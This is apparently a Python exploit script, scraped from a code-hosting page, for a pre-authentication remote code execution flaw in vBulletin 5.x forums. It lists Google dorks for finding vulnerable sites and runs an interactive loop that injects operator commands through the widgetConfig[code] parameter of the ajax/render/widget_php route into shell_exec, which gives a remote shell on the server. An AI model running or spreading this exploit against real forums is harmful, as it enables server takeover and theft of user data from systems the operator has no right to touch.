31 lines
No EOL
819 B
Python
Executable file
31 lines
No EOL
819 B
Python
Executable file
#!/usr/bin/python
|
|
#
|
|
# vBulletin 5.x 0day pre-auth RCE exploit
|
|
#
|
|
# This should work on all versions from 5.0.0 till 5.5.4
|
|
#
|
|
# Google Dorks:
|
|
# - site:*.vbulletin.net
|
|
# - "Powered by vBulletin Version 5.5.4"
|
|
|
|
import requests
|
|
import sys
|
|
|
|
if len(sys.argv) != 2:
|
|
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
|
|
|
|
params = {"routestring":"ajax/render/widget_php"}
|
|
|
|
while True:
|
|
try:
|
|
cmd = raw_input("vBulletin$ ")
|
|
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
|
|
r = requests.post(url = sys.argv[1], data = params)
|
|
if r.status_code == 200:
|
|
print r.text
|
|
else:
|
|
sys.exit("Exploit failed! :(")
|
|
except KeyboardInterrupt:
|
|
sys.exit("\nClosing shell...")
|
|
except Exception, e:
|
|
sys.exit(str(e)) |